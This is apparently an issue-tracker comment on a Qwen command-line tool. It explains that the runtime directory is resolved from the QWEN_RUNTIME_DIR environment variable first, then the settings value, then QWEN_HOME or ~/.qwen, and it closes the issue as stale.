Also the suggested priority order (`QWEN_RUNTIME_DIR > QWEN_HOME > settings`) is inverted — `Storage.getRuntimeBaseDir()` actually checks `QWEN_RUNTIME_DIR` env, then `setRuntimeBaseDir(merged.advanced?.runtimeOutputDir, ...)`, then `getGlobalQwenDir()` (= `QWEN_HOME` or `~/.qwen`). So settings outranks `QWEN_HOME`, which is the order currently documented. Closing as stale.
